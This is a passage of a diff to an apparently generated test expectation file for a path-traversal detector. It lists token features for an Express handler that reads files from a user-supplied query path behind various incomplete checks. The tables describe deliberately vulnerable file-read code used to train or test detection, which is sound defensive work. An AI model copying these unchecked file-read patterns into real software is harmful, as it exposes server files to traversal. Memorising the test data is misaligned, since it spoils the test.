readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:184:3:184:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:184:6:184:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:184:6:184:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:184:6:184:17 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:184:6:184:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:184:6:184:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:184:19:184:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:184:19:184:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:184:19:184:22 | path | calleeImports | fs | @@ -8513,6 +74234,56 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:184:19:184:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:184:19:184:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:184:19:184:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:16 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:16 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:16 | pathModule | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:16 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:16 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:27 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:27 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:27 | pathMod ... bsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:27 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:27 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:186:7:186:33 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:186:18:186:27 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:186:18:186:27 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:186:18:186:27 | isAbsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:186:18:186:27 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:186:18:186:27 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:187:5:187:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:187:8:187:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:187:8:187:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:187:8:187:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:187:8:187:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:187:8:187:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:187:21:187:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:187:21:187:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:187:21:187:24 | path | calleeImports | fs | @@ -8522,6 +74293,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:187:21:187:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:187:21:187:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:187:21:187:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:189:5:189:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:189:8:189:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:189:8:189:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:189:8:189:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:189:8:189:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:189:8:189:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:189:21:189:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:189:21:189:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:189:21:189:24 | path | calleeImports | fs | @@ -8531,6 +74327,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:189:21:189:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:189:21:189:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:189:21:189:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:10 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:19 | path.includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:19 | path.includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:19 | path.includes | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:19 | path.includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:19 | path.includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | exceptional return of path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | exceptional return of path.includes('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | exceptional return of path.includes('..') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | exceptional return of path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | exceptional return of path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | path.includes('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | path.includes('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | path.includes('..') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | path.includes('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:191:7:191:25 | path.includes('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:191:12:191:19 | includes | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:191:12:191:19 | includes | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:191:12:191:19 | includes | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:191:12:191:19 | includes | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:191:12:191:19 | includes | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:191:21:191:24 | '..' | CalleeFlexibleAccessPath | path.includes | | autogenerated/TaintedPath/normalizedPaths.js:191:21:191:24 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:191:21:191:24 | '..' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8539,6 +74360,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:191:21:191:24 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:191:21:191:24 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:191:21:191:24 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:192:5:192:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule 